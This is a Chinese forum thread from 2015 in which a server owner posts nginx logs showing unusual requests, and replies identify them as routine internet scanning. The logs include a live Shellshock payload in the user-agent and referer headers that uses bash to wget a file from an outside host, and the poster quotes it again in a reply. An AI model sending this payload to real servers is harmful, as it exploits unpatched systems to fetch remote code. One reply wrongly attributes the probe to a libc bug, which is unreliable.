这些是异常的访问请求:
2015/06/30 15:12:29 [error] 2926#0: *22 open() "/var/www/clientaccesspolicy.xml" failed (2: No such file or directory), client: 54.80.128.131, server: _, request: "GET /clientaccesspolicy.xml HTTP/1.1", host: "167.160.165.36"
54.80.128.131 - - [30/Jun/2015:15:12:29 -0400] "HEAD / HTTP/1.1" 200 0 "-" "Cloud mapping experiment. Contact [email protected]"
220.181.132.218 - - [30/Jun/2015:16:05:11 -0400] "GET / HTTP/1.1" 200 151 "http://xxxxxxxxx(隐藏一下)/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)"
101.199.112.54 - - [30/Jun/2015:16:06:40 -0400] "GET / HTTP/1.1" 200 151 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
220.181.132.200 - - [30/Jun/2015:16:08:09 -0400] "GET / HTTP/1.1" 200 151 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
180.153.99.56 - - [30/Jun/2015:17:21:45 -0400] "-" 400 0 "-" "-"
180.153.99.56 - - [30/Jun/2015:17:26:18 -0400] "GET / HTTP/1.0" 200 151 "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb dprftp.asuscomm.com/novo.php?ip=3136372e3136302e3136352e3336\x22" "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb dprftp.asuscomm.com/novo.php?ip=3136372e3136302e3136352e3336\x22"
61.240.144.64 - - [30/Jun/2015:23:57:28 -0400] "GET / HTTP/1.0" 200 151 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
这是哪位河北的大神留下的啊??????
1
realpg 2015-07-01 13:10:08 +08:00
鉴定:没被攻击
PS 第二条真聪明,利用日志做广告…… 我也学会了,下次用这种方式发简历求职好了…… |
2
RIcter 2015-07-01 13:18:44 +08:00 via iPhone
掃描 shellshock 碰巧掃到你了唄,又沒什麼大事
|
3
justlikemaki OP @realpg () { :;}; /bin/bash -c \x22wget -O /tmp/bbb dprftp.asuscomm.com/novo.php?ip=3136372e3136302e3136352e3336\x22
搞不懂这个是干嘛的。。。 |
4
reb00ts 2015-07-01 15:15:10 +08:00
莫慌,跑在外网的机器,被扫扫很正常
|
5
lhbc 2015-07-01 15:20:38 +08:00 via iPhone
@justlikemaki 扫漏洞,好像是之前的libc漏洞。
|
6
knightdf 2015-07-01 16:01:14 +08:00
这也叫被攻击啊?随便扫了扫你的服务器而已
|
7
DearTanker 2015-07-01 16:21:16 +08:00
|
9
ysjdx 2015-07-01 20:01:42 +08:00
@justlikemaki bash漏洞
|
10
popok 2015-07-01 20:17:35 +08:00
|
12
zscself 2015-07-01 22:15:17 +08:00 1
|
14
bios12567496 2015-07-01 22:58:40 +08:00
@MrDream 哈哈 以为对方是猴大宝了吧?
|
17
MrDream 2015-07-02 10:29:38 +08:00 via Android
@bios12567496 是的 :)
|